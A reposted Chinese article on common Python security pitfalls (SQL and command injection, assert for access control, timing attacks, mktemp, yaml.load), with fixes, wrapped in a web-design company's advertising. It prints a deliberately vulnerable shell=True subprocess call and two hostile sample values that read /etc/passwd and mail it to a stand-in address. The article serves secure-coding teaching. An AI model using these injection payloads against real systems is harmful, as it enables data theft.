Python中的10個(gè)常見安全漏洞,以及如何避免(上)-創(chuàng)新互聯(lián)

簡(jiǎn)評(píng):編寫安全代碼很困難,當(dāng)你學(xué)習(xí)一個(gè)編程語言、模塊或框架時(shí),你會(huì)學(xué)習(xí)其使用方法。 在考慮安全性時(shí),你需要考慮如何避免被濫用,Python 也不例外,即使在標(biāo)準(zhǔn)庫中,也存在用于編寫應(yīng)用的不良實(shí)踐。然而,許多 Python 開發(fā)人員卻根本不知道它們。

成都創(chuàng)新互聯(lián)公司專注于郫都網(wǎng)站建設(shè)服務(wù)及定制,我們擁有豐富的企業(yè)做網(wǎng)站經(jīng)驗(yàn)。 熱誠(chéng)為您提供郫都營(yíng)銷型網(wǎng)站建設(shè),郫都網(wǎng)站制作、郫都網(wǎng)頁設(shè)計(jì)、郫都網(wǎng)站官網(wǎng)定制、微信小程序定制開發(fā)服務(wù),打造郫都網(wǎng)絡(luò)公司原創(chuàng)品牌,更為您提供郫都網(wǎng)站排名全網(wǎng)營(yíng)銷落地服務(wù)。

1. 輸入注入(Input injection)

注入×××非常廣泛而且很常見,注入有很多種類,它們影響所有的語言、框架和環(huán)境。

SQL 注入是直接編寫 SQL 查詢(而非使用 ORM) 時(shí)將字符串字面量與變量混合。我讀過很多代碼,其中「escaping quotes」被認(rèn)為是一種修復(fù),但事實(shí)并非如此,可以通過這個(gè)鏈接查看 SQL 注入所有可能發(fā)生的復(fù)雜方式。

命令注入可能在使用 popen、subprocess、os.system 調(diào)用一個(gè)進(jìn)程并從變量中獲取參數(shù)時(shí)發(fā)生,當(dāng)調(diào)用本地命令時(shí),有人可能會(huì)將某些值設(shè)置為惡意值。

下面是個(gè)簡(jiǎn)單的腳本,使用用戶提供的文件名調(diào)用子進(jìn)程:

import subprocess

def transcode_file(request, filename):
    command = 'ffmpeg -i "{source}" output_file.mpg'.format(source=filename)
    subprocess.call(command, shell=True)  # a bad idea!

×××者會(huì)將 filename 的值設(shè)置為“; cat / etc / passwd | mail them@domain.com 或者其他同樣危險(xiǎn)的東西。

修復(fù):

如果你使用了 Web 框架,可以用附帶的實(shí)用程序?qū)斎脒M(jìn)行清理,除非有充分的理由,否則不要手動(dòng)構(gòu)建 SQL 查詢,大多數(shù) ORM 都具有內(nèi)置的消毒方法。

對(duì)于 shell,可以使用 shlex 模塊正確地轉(zhuǎn)義輸入。

2. assert 語句(Assert statements)

不要使用 assert 語句來防止用戶訪問不應(yīng)訪問的代碼段。

def foo(request, user):
   assert user.is_admin, “user does not have access”
   # secure code...

現(xiàn)在,默認(rèn)情況下,Python 以 debug 為 true 來執(zhí)行腳本,但在生產(chǎn)環(huán)境中,通常使用優(yōu)化運(yùn)行,這將會(huì)跳過 assert 語句并直接轉(zhuǎn)到安全代碼,而不管用戶是否是 is_admin。

修復(fù):

僅在與其他開發(fā)人員進(jìn)行通信時(shí)使用 assert 語句,例如在單元測(cè)試中或?yàn)榱朔乐共徽_的 API 使用。

3. 計(jì)時(shí)×××(Timing attacks)

計(jì)時(shí)×××本質(zhì)上是一種通過計(jì)時(shí)比較提供值所需時(shí)間來暴露行為和算法的方式。計(jì)時(shí)×××需要精確性,所以通常不能用于高延遲的遠(yuǎn)程網(wǎng)絡(luò)。由于大多數(shù) Web 應(yīng)用程序涉及可變延遲,因此幾乎不可能在 HTTP Web 服務(wù)器上編寫計(jì)時(shí)×××。

但是,如果你有提示輸入密碼的命令行應(yīng)用程序,則×××者可以編寫一個(gè)簡(jiǎn)單的腳本來計(jì)算將其值與實(shí)際密碼進(jìn)行比較所需的時(shí)間。

修復(fù):

使用在 Python 3.5 中引入的 secrets.compare_digest 來比較密碼和其他私密值。

4.臨時(shí)文件(Temporary files)

要在 Python 中創(chuàng)建臨時(shí)文件,通常使用 mktemp() 函數(shù)生成一個(gè)文件名,然后使用該名稱創(chuàng)建一個(gè)文件。 「這是不安全的,因?yàn)榱硪粋€(gè)進(jìn)程可能會(huì)在調(diào)用 mktemp() 和隨后嘗試通過第一個(gè)進(jìn)程創(chuàng)建文件之間的空隙創(chuàng)建一個(gè)同名文件?!惯@意味著應(yīng)用程序可能加載錯(cuò)誤的數(shù)據(jù)或暴露其他的臨時(shí)數(shù)據(jù)。

如果調(diào)用不正確的方法,則最新版本的 Python 會(huì)拋出運(yùn)行警告。

修復(fù):

如果需要生成臨時(shí)文件,請(qǐng)使用 tempfile 模塊并使用 mkstemp。

5. 使用 yaml.load

引用 PyYAML 文檔:

警告:使用從不可信源接收到的數(shù)據(jù)來調(diào)用 yaml.load 是不安全的! yaml.load 和pickle.load 一樣強(qiáng)大,所以可以調(diào)用任何 Python 函數(shù)。
在流行的 Python 項(xiàng)目 Ansible 中找到的這個(gè)美麗的例子,你可以將此值作為(有效)YAML 提供給 Ansible Vault,它使用文件中提供的參數(shù)調(diào)用 os.system()。

!!python/object/apply:os.system ["cat /etc/passwd | mail me@hack.c"]
所以,從用戶提供的值中有效地加載 YAML 文件會(huì)讓應(yīng)用對(duì)×××打開大門。

修復(fù):

總是使用 yaml.safe_load,除非你有一個(gè)非常好的理由。

Python 中的 10 個(gè)常見安全漏洞,以及如何避免(上)

另外有需要云服務(wù)器可以了解下創(chuàng)新互聯(lián)scvps.cn,海內(nèi)外云服務(wù)器15元起步,三天無理由+7*72小時(shí)售后在線,公司持有idc許可證,提供“云服務(wù)器、裸金屬服務(wù)器、高防服務(wù)器、香港服務(wù)器、美國(guó)服務(wù)器、虛擬主機(jī)、免備案服務(wù)器”等云主機(jī)租用服務(wù)以及企業(yè)上云的綜合解決方案,具有“安全穩(wěn)定、簡(jiǎn)單易用、服務(wù)可用性高、性價(jià)比高”等特點(diǎn)與優(yōu)勢(shì),專為企業(yè)上云打造定制,能夠滿足用戶豐富、多元化的應(yīng)用場(chǎng)景需求。

網(wǎng)頁題目:Python中的10個(gè)常見安全漏洞,以及如何避免(上)-創(chuàng)新互聯(lián)
網(wǎng)站URL:http://muchs.cn/article18/dsoogp.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供微信公眾號(hào)、搜索引擎優(yōu)化標(biāo)簽優(yōu)化、網(wǎng)站收錄、微信小程序、自適應(yīng)網(wǎng)站

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來源: 創(chuàng)新互聯(lián)

微信小程序開發(fā)